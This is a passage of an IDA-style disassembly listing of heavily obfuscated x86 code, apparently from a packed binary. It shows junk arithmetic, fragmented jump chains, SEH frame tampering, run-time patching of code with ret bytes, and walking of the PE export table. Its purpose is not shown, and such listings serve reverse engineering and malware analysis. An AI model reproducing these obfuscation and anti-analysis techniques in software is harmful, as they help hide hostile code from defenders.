; START OF FUNCTION CHUNK FOR sub_43119E
loc_431593: ; CODE XREF: sub_43119E:loc_431BC9�j
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_431595: ; CODE XREF: sub_4314D8+F25�j
jmp loc_42E6CB
; END OF FUNCTION CHUNK FOR sub_4314D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_43159A: ; CODE XREF: sub_430C91-95�j
jmp loc_430479
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430A1F
loc_43159F: ; CODE XREF: j8.b78ws:loc_42E106�j
; sub_430A1F+14�j
jmp loc_42E0E8
; END OF FUNCTION CHUNK FOR sub_430A1F
; =============== S U B R O U T I N E =======================================
sub_4315A4 proc near ; CODE XREF: sub_43193A+2�p
; FUNCTION CHUNK AT 0042E371 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FCEB SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042FE55 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00430436 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004304EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430B22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004319FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431B81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431DBE SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043225C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00432490 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00432551 SIZE 0000000E BYTES
push large dword ptr fs:0
mov large fs:0, esp
call sub_42E78A
call sub_42FFCD
jmp loc_42FCEB
sub_4315A4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_4315C1: ; CODE XREF: sub_4306C9:loc_432747�j
jnz loc_4315D6
lea eax, [ebp+var_125]
push eax
call sub_4302AC
mov [ebp+var_4], eax
; END OF FUNCTION CHUNK FOR sub_4306C9
; START OF FUNCTION CHUNK FOR sub_43145D
loc_4315D6: ; CODE XREF: sub_43145D-3148�j
; sub_43145D-3133�j ...
mov eax, [ebp-1Ch]
jmp loc_42F797
; END OF FUNCTION CHUNK FOR sub_43145D
; ---------------------------------------------------------------------------
popf
jmp loc_42F990
; =============== S U B R O U T I N E =======================================
sub_4315E4 proc near ; CODE XREF: sub_4301DE-1460�p
; FUNCTION CHUNK AT 0042E8CB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004303D2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00430AAC SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00431038 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431161 SIZE 00000014 BYTES
xchg eax, [esp+0]
mov eax, [esp+0]
push edx
push 29A54604h
pop edx
or edx, 4E348408h
jmp loc_4303D2
sub_4315E4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_4315FC: ; CODE XREF: sub_42FFCD:loc_42FFD6�j
sub ebx, 10000h
mov eax, [ebx]
call sub_42E4AA
loc_431609: ; CODE XREF: j8.b78ws:0042EA78�j
jnz loc_42ECD4
adc ebp, edx
jmp sub_4308AB
; END OF FUNCTION CHUNK FOR sub_42FFCD
; =============== S U B R O U T I N E =======================================
sub_431616 proc near ; CODE XREF: j8.b78ws:0042E94A�j
; sub_4316B9:loc_42F776�p
mov [esp+0], edx
pop edx
push eax
mov eax, [ebp-4]
push eax
jmp loc_431363
sub_431616 endp
; ---------------------------------------------------------------------------
loc_431624: ; CODE XREF: j8.b78ws:00430EA0�j
jle loc_42F8B6
; =============== S U B R O U T I N E =======================================
sub_43162A proc near ; CODE XREF: sub_432402+8�p
xchg edi, [esp+0]
pop edi
add eax, 88F0ECB0h
mov eax, [eax]
push offset loc_42E0A8
jmp j_nullsub_95
sub_43162A endp
; =============== S U B R O U T I N E =======================================
sub_431640 proc near ; CODE XREF: sub_42E140�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042EE79 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042F9A9 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00431935 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043198E SIZE 00000005 BYTES
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
pushf
loc_431647: ; CODE XREF: j8.b78ws:loc_43063D�j
push 72728EECh
jmp loc_43198E
sub_431640 endp
; =============== S U B R O U T I N E =======================================
sub_431651 proc near ; CODE XREF: j8.b78ws:0043085B�j
; sub_43131C+901�p
; FUNCTION CHUNK AT 0042F792 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430E60 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
mov edx, [ebp-20h]
mov [edx], al
inc dword ptr [ebp-20h]
jmp loc_430E60
sub_431651 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43082D
loc_431662: ; CODE XREF: sub_43082D:loc_4324FB�j
mov ds:dword_42E06C, eax
jmp loc_430336
; ---------------------------------------------------------------------------
loc_43166C: ; CODE XREF: sub_43082D:loc_42E43A�j
cmp ds:dword_42E06C, 0
jnz loc_430BD2
call sub_431DF1
call sub_430323
; END OF FUNCTION CHUNK FOR sub_43082D
; START OF FUNCTION CHUNK FOR sub_42E825
loc_431683: ; CODE XREF: sub_42E825+11F7�j
; sub_42E825+1208�j ...
mov eax, [ebp+var_20]
movzx eax, byte ptr [eax]
mov [ebp+var_1C], eax
js loc_4323E8
inc [ebp+var_20]
mov eax, [ebp+var_1C]
jmp loc_43264F
; END OF FUNCTION CHUNK FOR sub_42E825
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43169E proc near ; CODE XREF: sub_4321A8+1�p
push ebp
mov ebp, esp
call sub_432328
sub_43169E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E934
loc_4316A6: ; CODE XREF: sub_42E934+9�j
jmp loc_432020
; END OF FUNCTION CHUNK FOR sub_42E934
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4316AB proc near ; CODE XREF: sub_430D5F+6�p
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004309AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431E51 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00432572 SIZE 0000000A BYTES
xchg ebp, [esp+0]
mov ebp, [esp+0]
mov ebp, esp
push ecx
loc_4316B4: ; CODE XREF: sub_431F6D-1D33�j
jmp loc_4309AC
sub_4316AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4316B9 proc near ; CODE XREF: sub_4318B3-34C3�p
; j8.b78ws:0042FC56�j
; FUNCTION CHUNK AT 0042F776 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
add eax, ebp
add eax, 0F1A4C359h
popf
jmp loc_42F776
sub_4316B9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA02
loc_4316CB: ; CODE XREF: sub_42FA02+C�j
cdq
add eax, [esp+8+var_8]
adc edx, [esp+8+var_4]
add esp, 8
movzx eax, word ptr [eax]
jmp loc_43118E
; END OF FUNCTION CHUNK FOR sub_42FA02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430273
loc_4316DE: ; CODE XREF: sub_430273-480�j
call sub_431711
loc_4316E3: ; CODE XREF: sub_42E174+232B�j
jmp loc_431BF0
; END OF FUNCTION CHUNK FOR sub_430273
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FAE7
loc_4316EE: ; CODE XREF: sub_42FAE7-D86�j
jz loc_431DC1
jmp loc_43249E
; END OF FUNCTION CHUNK FOR sub_42FAE7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430A75
loc_4316FA: ; CODE XREF: sub_430A75+D0C�j
jmp loc_42FAFF
; END OF FUNCTION CHUNK FOR sub_430A75
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_4316FF: ; CODE XREF: sub_42ED88:loc_430CC1�j
push eax
; END OF FUNCTION CHUNK FOR sub_42ED88
; START OF FUNCTION CHUNK FOR sub_42EC6B
loc_431700: ; CODE XREF: sub_42EC6B-97F�j
mov eax, [ebp-8]
cdq
add eax, [esp+4+var_4]
call sub_42FF6E
; END OF FUNCTION CHUNK FOR sub_42EC6B
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43170C: ; CODE XREF: sub_43119E-C3C�j
jmp loc_430967
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_431711 proc near ; CODE XREF: j8.b78ws:0042FC5D�j
; sub_430273:loc_4316DE�p
arg_0 = dword ptr 4
mov [esp+0], ecx
pop ecx
add edx, 52FAD2EDh
xchg edx, [esp-4+arg_0]
jmp sub_4302E0
sub_431711 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_431723: ; CODE XREF: j8.b78ws:0043087D�j
jl loc_431884
; =============== S U B R O U T I N E =======================================
sub_431729 proc near ; CODE XREF: j8.b78ws:004327AE�p
; FUNCTION CHUNK AT 00430C79 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00431508 SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
push 7A7B5A83h
pop edx
add edx, 7E63016Dh
add edx, ebp
jmp loc_431508
sub_431729 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, ecx
push edx
jmp sub_42FCBF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43285C
loc_431748: ; CODE XREF: sub_43285C:loc_42E05C�j
jz loc_43051F
push ebp
mov eax, [ebp-20h]
call sub_42E825
pop ecx
jmp loc_431C3C
; END OF FUNCTION CHUNK FOR sub_43285C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_43175E: ; CODE XREF: sub_431F6D+10�j
jmp loc_430135
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FB98
loc_431763: ; CODE XREF: sub_42FB98:loc_430780�j
add eax, ebp
add eax, 0A3770402h
mov eax, [eax]
call nullsub_3
retn
; END OF FUNCTION CHUNK FOR sub_42FB98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431773: ; CODE XREF: sub_43119E-27FC�j
jmp loc_4309A5
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431ED3
loc_431779: ; CODE XREF: sub_431ED3+18�j
jmp loc_431305
; END OF FUNCTION CHUNK FOR sub_431ED3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430A75
loc_43177E: ; CODE XREF: sub_430A75+6�j
mov eax, [ebp-4]
jmp loc_4316FA
; END OF FUNCTION CHUNK FOR sub_430A75
; ---------------------------------------------------------------------------
add ebp, esi
jmp sub_42E5CA
; =============== S U B R O U T I N E =======================================
sub_43178D proc near ; CODE XREF: j8.b78ws:0042F9E5�j
; sub_42E857:loc_43040F�p
; FUNCTION CHUNK AT 0042EBA7 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00431413 SIZE 00000012 BYTES
mov [esp+0], eax
pop eax
call sub_42E2A1
mov ds:dword_42E048, eax
mov ds:byte_42F75C, 1
lea eax, [ebp-14h]
xor edx, edx
call sub_42EBA9
jmp loc_431413
sub_43178D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E873
loc_4317B1: ; CODE XREF: sub_42E873+362F�j
mov edx, 0D504D785h
call sub_432702
pushf
mov [esp+4+var_4], eax
rol eax, 17h
mov ds:dword_4312B8, eax
retn
; END OF FUNCTION CHUNK FOR sub_42E873
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_4317C9: ; CODE XREF: sub_431F6D-3CF5�j
jmp loc_42E0D9
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431403
loc_4317CE: ; CODE XREF: sub_431403+B�j
mov esp, ebp
mov ebp, offset sub_4317D9
xchg ebp, [esp+0]
locret_4317D8: ; CODE XREF: sub_43082D+1AC9�j
retn
; END OF FUNCTION CHUNK FOR sub_431403
; =============== S U B R O U T I N E =======================================
sub_4317D9 proc near ; DATA XREF: sub_431403+3CD�o
var_4 = dword ptr -4
push 0A1E2B4AEh
mov eax, offset sub_43080D
xchg eax, [esp+4+var_4]
retn
sub_4317D9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sbb ebx, ebp
jmp sub_42E24A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313E5
loc_4317EE: ; CODE XREF: sub_4313E5:loc_430A67�j
mov eax, [ebp-18h]
loc_4317F1: ; CODE XREF: j8.b78ws:0042E543�j
add eax, eax
cdq
add eax, [esp+8+var_8]
adc edx, [esp+8+var_4]
add esp, 8
jmp loc_42E7C8
; END OF FUNCTION CHUNK FOR sub_4313E5
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431804 proc near ; DATA XREF: j8.b78ws:0042EE0E�o
push ebp
mov ebp, esp
call sub_42EEBE
and eax, 9E0B19Eh
jmp sub_430905
sub_431804 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431817: ; CODE XREF: sub_43119E+CE�j
adc edi, 4A04BB50h
jmp loc_43089D
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F41
loc_431822: ; CODE XREF: sub_431F41:loc_4304E1�j
pop esi
add esi, 73E09A40h
add esi, ebp
add esi, 59591A59h
jmp loc_432514
; END OF FUNCTION CHUNK FOR sub_431F41
; =============== S U B R O U T I N E =======================================
sub_431836 proc near ; DATA XREF: j8.b78ws:00430DC5�o
add eax, 4
mov edx, [eax]
call loc_42EBE1
sub_431836 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_430D58
loc_431840: ; CODE XREF: sub_430D58+1�j
jmp loc_43035A
; END OF FUNCTION CHUNK FOR sub_430D58
; =============== S U B R O U T I N E =======================================
sub_431845 proc near ; DATA XREF: sub_4326DF:loc_42E666�o
xor eax, eax
push offset sub_42FE94
jmp nullsub_75
sub_431845 endp
; ---------------------------------------------------------------------------
loc_431851: ; DATA XREF: sub_4305FA+3�o
mov [ebp-0Ch], edx
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_431854: ; CODE XREF: sub_4308AB+FBB�j
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4308AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC54
loc_43185B: ; CODE XREF: sub_42EC54+381D�j
jmp loc_43211C
; END OF FUNCTION CHUNK FOR sub_42EC54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_431860: ; CODE XREF: sub_4308AB+1B19�j
mov eax, [ebp-4]
mov [ebp-0Ch], eax
jmp loc_431854
; END OF FUNCTION CHUNK FOR sub_4308AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431DA0
loc_43186B: ; CODE XREF: sub_431DA0+E�j
mov ebx, [eax]
add eax, 4
push offset sub_430FB4
jmp nullsub_92
; END OF FUNCTION CHUNK FOR sub_431DA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43187A: ; CODE XREF: sub_43119E:loc_431C22�j
push offset sub_4310EC
jmp nullsub_39
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_431884: ; CODE XREF: j8.b78ws:loc_431723�j
; sub_4308AB+146B�j
jge loc_4304FC
add eax, 5C776E12h
loc_431890: ; CODE XREF: sub_4308AB:loc_43005F�j
push 1801F6A7h
pop eax
or eax, 7CC85F63h
xor eax, 0FC63F90Eh
add eax, ebp
jmp loc_42E4C9
; END OF FUNCTION CHUNK FOR sub_4308AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430754
loc_4318A9: ; CODE XREF: sub_430754+12�j
push offset sub_4325C5
jmp nullsub_87
; END OF FUNCTION CHUNK FOR sub_430754
; =============== S U B R O U T I N E =======================================
sub_4318B3 proc near ; CODE XREF: j8.b78ws:0042E3A4�j
; j8.b78ws:00431D3A�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E0AE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E3D8 SIZE 0000001D BYTES
xchg edi, [esp+4+var_4]
pop edi
js loc_42E0AE
mov byte ptr [eax], 0C3h
mov [ebp-4], eax
push 94E41060h
sub [esp+4+var_4], 94E41044h
pushf
jmp loc_42E3D8
sub_4318B3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4318D5: ; DATA XREF: sub_42FA63:loc_42FEDF�o
mov eax, ds:dword_43008C
or eax, eax
jnz loc_42ED7B
call sub_432300
push offset sub_42ED66
jmp loc_42E051
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F88
loc_4318F2: ; CODE XREF: sub_430F88:loc_431080�j
jz loc_42FA7C
jmp loc_432375
; END OF FUNCTION CHUNK FOR sub_430F88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_4318FD: ; CODE XREF: sub_4306C9-1F7F�j
push eax
call sub_42E2A1
jmp loc_431BEB
; END OF FUNCTION CHUNK FOR sub_4306C9
; =============== S U B R O U T I N E =======================================
sub_431908 proc near ; CODE XREF: sub_4306C9+3�j
; FUNCTION CHUNK AT 00430E1E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00431BE5 SIZE 00000006 BYTES
add esp, 0FFFFFFECh
mov eax, offset dword_42E07C
call sub_430C12
cmp ds:dword_42E080, 0
jnz loc_42F7DF
jmp loc_430E1E
sub_431908 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431DF1
loc_431927: ; CODE XREF: sub_431DF1+11�j
or eax, eax
jnz locret_431934
loc_43192F: ; CODE XREF: sub_430C91-812�j
; sub_431DF1+6�j
call sub_43193A
locret_431934: ; CODE XREF: sub_431DF1-4C8�j
retn
; END OF FUNCTION CHUNK FOR sub_431DF1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431640
loc_431935: ; CODE XREF: sub_431640-27B7�j
jmp loc_42F9A9
; END OF FUNCTION CHUNK FOR sub_431640
; =============== S U B R O U T I N E =======================================
sub_43193A proc near ; CODE XREF: sub_431DF1:loc_43192F�p
arg_4 = dword ptr 8
push ebx
push ecx
call sub_4315A4
mov esp, [esp+arg_4]
jmp loc_431271
sub_43193A endp
; =============== S U B R O U T I N E =======================================
sub_43194A proc near ; DATA XREF: j8.b78ws:00431A0C�o
; FUNCTION CHUNK AT 0042E0BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA0E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431A03 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00431FC4 SIZE 00000005 BYTES
jnz loc_431959
add dword ptr [ebp-8], 4
jmp loc_42EA0E
; ---------------------------------------------------------------------------
loc_431959: ; CODE XREF: sub_43194A�j
add dword ptr [ebp-8], 2
jmp loc_42E0BB
sub_43194A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E10C
loc_431962: ; CODE XREF: sub_42E10C+4�j
; sub_431AD9+8�j
call sub_42F832
mov ebp, edi
jmp loc_431AD6
; END OF FUNCTION CHUNK FOR sub_42E10C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43196E: ; CODE XREF: sub_43119E:loc_4312B1�j
jl loc_42E689
loc_431974: ; CODE XREF: sub_42E64C+11�j
jmp nullsub_36
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
mov [eax], edx
or edx, 0B137167Eh
jmp loc_42E686
; ---------------------------------------------------------------------------
xchg ebx, ebp
jmp sub_42E796
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431640
loc_43198E: ; CODE XREF: sub_431640+C�j
jmp loc_42EE79
; END OF FUNCTION CHUNK FOR sub_431640
; ---------------------------------------------------------------------------
loc_431993: ; DATA XREF: sub_4307FC+14AC�o
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_431026
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_431026
jmp loc_42FB10
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E381
loc_4319B0: ; CODE XREF: sub_42E381+18�j
; sub_42E5CA+1A7E�j
mov eax, [ebp-4]
mov edx, [ebp-14h]
add eax, [edx+20h]
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
push offset loc_431FE3
jmp sub_430F9D
; END OF FUNCTION CHUNK FOR sub_42E381
; =============== S U B R O U T I N E =======================================
sub_4319CA proc near ; DATA XREF: j8.b78ws:0042FDFC�o
; FUNCTION CHUNK AT 0042F8AA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042FE1B SIZE 00000006 BYTES
mov eax, esp
push ebx
push 7BEDAF2Eh
pop ebx
sub ebx, 0CD37DF37h
jmp loc_42FE1B
sub_4319CA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43058C
loc_4319DE: ; CODE XREF: sub_43058C:loc_431F3C�j
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov eax, [eax+60h]
jmp loc_43053C
; ---------------------------------------------------------------------------
loc_4319F2: ; CODE XREF: sub_43058C:loc_43059B�j
xor eax, eax
call sub_431444
loc_4319F9: ; CODE XREF: sub_42FC8B+A86�j
jmp loc_432015
; END OF FUNCTION CHUNK FOR sub_43058C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_4319FE: ; CODE XREF: sub_4315A4-1898�j
jmp loc_42FE55
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43194A
loc_431A03: ; CODE XREF: sub_43194A:loc_431FC4�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43194A
; ---------------------------------------------------------------------------
loc_431A05: ; CODE XREF: j8.b78ws:0042EA05�j
mov eax, [ebp+8]
cmp dword ptr [eax-0Ch], 4
push offset sub_43194A
jmp loc_431D88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_431A16: ; CODE XREF: sub_43094F:loc_430998�j
mov large fs:0, esp
call sub_42EA18
loc_431A22: ; CODE XREF: sub_42ED88+3703�j
push offset loc_4325AE
jmp nullsub_37
; END OF FUNCTION CHUNK FOR sub_43094F
; =============== S U B R O U T I N E =======================================
sub_431A2C proc near ; DATA XREF: sub_42FD11+F�o
var_4 = dword ptr -4
pushf
mov [esp+4+var_4], eax
rol eax, 19h
mov ds:dword_4300B4, eax
retn
sub_431A2C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_431A3A: ; CODE XREF: sub_42E9AD+238B�j
jmp loc_42E3D1
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430273
loc_431A3F: ; CODE XREF: sub_430273-20D5�j
ror eax, 19h
jmp loc_42E523
; END OF FUNCTION CHUNK FOR sub_430273
; =============== S U B R O U T I N E =======================================
sub_431A47 proc near ; CODE XREF: sub_42FDAF-1574�p
; j8.b78ws:00430CE2�j
xchg eax, [esp+0]
pop eax
mov [ebp-10h], eax
mov eax, [ebp-10h]
jmp loc_431524
sub_431A47 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_431A56: ; CODE XREF: j8.b78ws:loc_4302DB�j
; j8.b78ws:00432618�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_431A57: ; CODE XREF: sub_42EA96+1BE3�j
jmp loc_4314A7
; END OF FUNCTION CHUNK FOR sub_42EA96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E174
loc_431A5C: ; CODE XREF: sub_42E174+16�j
jmp loc_43048A
; END OF FUNCTION CHUNK FOR sub_42E174
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_431A62: ; CODE XREF: sub_4306C9+1530�j
jmp loc_431326
; END OF FUNCTION CHUNK FOR sub_4306C9
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431A67 proc near ; CODE XREF: sub_42EA96+4�p
; FUNCTION CHUNK AT 0042E0FF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042EA59 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043146E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004321E7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00432213 SIZE 0000000A BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_430098
or eax, eax
jmp loc_42EA59
sub_431A67 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431A7B proc near ; CODE XREF: j8.b78ws:00431ECE�p
; sub_42EA8A+35D8�j
mov [esp+0], edx
pop edx
mov [ebp-14h], eax
cmp dword ptr [ebp-10h], 3
jnb loc_430F55
mov eax, [ebp+8]
cmp dword ptr [eax-14h], 4
jnz loc_43000A
jmp loc_430F03
sub_431A7B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431A9E proc near ; CODE XREF: j8.b78ws:0042F98B�j
; sub_43119E-1321�p
xchg edx, [esp+0]
pop edx
rol eax, 0Eh
push esi
push 6CFF972Fh
jmp loc_42FB8D
sub_431A9E endp
; =============== S U B R O U T I N E =======================================
sub_431AB0 proc near ; CODE XREF: j8.b78ws:0042E0C1�j
; sub_43237F:loc_430701�p
; FUNCTION CHUNK AT 004304C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043138E SIZE 00000008 BYTES
mov [esp+0], eax
pop eax
push eax
cmp dword ptr [ebp-14h], 6
setz al
call sub_430E65
pop ecx
shl eax, 3
jmp loc_4304C1
sub_431AB0 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_431ACB: ; DATA XREF: sub_4307FC-5A9�o
jz loc_431026
call sub_4307EC
; START OF FUNCTION CHUNK FOR sub_42E10C
loc_431AD6: ; CODE XREF: sub_42E10C+385D�j
shl esi, 19h
; END OF FUNCTION CHUNK FOR sub_42E10C
; =============== S U B R O U T I N E =======================================
sub_431AD9 proc near ; CODE XREF: sub_4301B9:loc_430B7B�p
mov [esp+0], ebx
pop ebx
test byte ptr [ebp-7], 8
jz loc_431962
push ebp
mov eax, [ebp-20h]
jmp loc_4312AC
sub_431AD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431AF0 proc near ; DATA XREF: sub_430180+6�o
mov [ebp-20h], eax
sub_431AF0 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E487
loc_431AF3: ; CODE XREF: sub_42E487+D�j
; sub_42F832:loc_42ED83�j ...
jz loc_430EFE
call sub_43285C
; END OF FUNCTION CHUNK FOR sub_42E487
; =============== S U B R O U T I N E =======================================
sub_431AFE proc near ; CODE XREF: sub_431042-2CDB�p
; j8.b78ws:0042FB27�j
; FUNCTION CHUNK AT 0042E7D4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042E7FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EE8E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042EEA8 SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
jnz loc_42EEA8
call sub_432300
mov edx, 0B9726E5Ah
jmp loc_42EE8E
sub_431AFE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E12B
loc_431B17: ; CODE XREF: sub_42E12B+9�j
inc ds:dword_43129C
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
call nullsub_4
push ebx
push 72B0741Eh
pop ebx
add ebx, 8D929FA4h
